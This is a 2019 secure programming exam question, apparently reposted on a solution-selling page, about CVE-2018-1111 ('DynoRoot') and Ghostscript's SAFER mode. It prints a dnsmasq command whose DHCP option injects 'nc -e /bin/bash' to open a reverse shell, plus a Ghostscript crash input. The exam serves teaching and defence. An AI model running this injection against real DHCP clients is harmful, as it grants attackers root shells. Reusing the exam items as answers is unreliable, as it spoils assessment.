[2019] INFR11098 SECURE PROGRAMMING - Final Exam - Q2 High Profile Vulnerabilities
2. This question concerns some high profile vulnerabilities found in real-world code.
(a) In May 2018, CVE-2018-1111 was published by Red Hat, reporting on a bug found by Felix Wilhelm of Google Security Team. The vulnerability became nicknamed “DynoRoot”. An exploit against the DHCP client in several versions of Linux is achieved with the code:
dnsmasq --interface=eth1 --bind-interfaces --except-interface=lo \
--dhcp- range=10.1.1.1,10.1.1.10,1h \
--conf-file=/dev/null --dhcp-opton=6,10.1.1.1 -- dhcp-opton=3,10.1.1.1 \
--dhcp-opton="252,x’&nc -e /bin/bash 10.1.1.1 1337 #"
Recall that DHCP is a protocol that provides a machine connecting to a network with an IP address and other network settings. The program dnsmasq runs a DHCP server.
i. Explain carefully how you think the exploit works and what capability
it may give the attacker. [5 marks]
ii. What is the standard name for this kind of vulnerability? [1 mark]
iii. Give a scenario under which the attack could be mounted. [2 marks]
iv. What is the likely root cause of the problem and how would you go about fixing it? [2 marks]
v. Supposing you can’t patch the DHCP client running on a machine, suggest two other ways to avoid the problem. [2 marks]
(b) Artifex Ghostscript is a widely-used open source implementation of Adobe’s PostScript language. PostScript (PS) is an interpreted, dynamically typed, stack-based Turing-complete programming language which describes printed pages. Ghostscript is used in GUI applications, displaying PS and PDF documents, and as a library inside programs such as the ImageMagick image manipulator (often used in web applications) and the thumbnail generating utility used by some desktop environments.
i. Considering the usage modes of Ghostscript, suggest two threat scenarios for an attacker with a computationally expensive PS file. [2 marks]
ii. Ghostscript provides a restricted mode called SAFER which disables operators to delete and rename files and open piped commands. It is designed to make the program safer to run on untrusted PS files. Internally this is implemented with a flag which is set from a command
line option, -dSAFER.
Considering the code fragments in Figure 1 on the next page, which are part of the mechanism behind SAFER, discuss the security design of this option and contrast it with other mechanisms for restricting the privilege of a running process.
(Note: you are not expected to fully understand the PostScript code.) [5 marks]
iii. SAFER mode restricts reading files other than those given in the command line arguments or in paths from FONTPATH and LIBPATH environment variables. Suggest a possible attack vector for a graphics program run from a web server. [2 marks]
iv. An unexpected crash is caused in the Ghostscript interpreter when it is invoked like this:
$ gs -dSAFER
GS><< /Whatever /YouWant >> setpattern
Segmentation fault
(The user types input following the GS> prompt; the data inside << and>> defines a dictionary mapping the key Whatever to YouWant). The setpattern operator invokes setcolor. Considering the function header given in Figure 2 on the next page, explain what the problem might be here, the type of vulnerability involved, the possible consequences, and finally how the problem may be fixed.
187 % DELAYSAFER is effectively the same as newer NOSAFER
188 currentdict /DELAYSAFER known { /DELAYSAFER //true def /NOSAFER //true def } if
189 /SAFER currentdict /NOSAFER known {
190 //false
191 } {
192 currentdict /SAFER known
193 currentdict /PARANOIDSAFER known or % PARANOIDSAFER is equivalent
194 }
195 ifelse def
...
2232 /.setsafe
2233 {
2234 SAFETY /safe get not {
2235 <<
2236 /PermitFileReading [ ]
2237 /PermitFileWriting [ ]
2238 /PermitFileControl [ ]
2239 >> setuserparams
2240 }
2241 if
2242 .locksafe
2243 } .bind executeonly odef
Figure 1: Fragments of gs_init.ps from Ghostscript for Question 2(b)ii.
250 /*
251 * <param1> ... <paramN> setcolor -
252 *
253 * Set the current color. All of the parameters except the topmost (paramN) are
254 * numbers; the topmost (and possibly only) entry may be pattern dictionary or
255 * a null object.
256 *
257 * The use of one operator to set both patterns and "normal" colors is
258 * consistent with Adobe’s documentation, but primarily reflects the use of
259 * gs_setcolor for both purposes in the graphic library. An alternate
260 * implementation would use a .setpattern operator, which would interface with
261 * gs_setpattern.
262 *
263 * This operator is hidden by a pseudo-operator of the same name, so it will
264 * only be invoked under controlled situations. Hence, it does no operand
265 * checking.
266 */
267 static int
268 zsetcolor(i_ctx_t *i_ctx_p) { ... }
Figure 2: Fragment of zcolor.c from Ghostscript for Question 2(b)iv.
Get the Solution to This Question
WeChat
WhatsApp
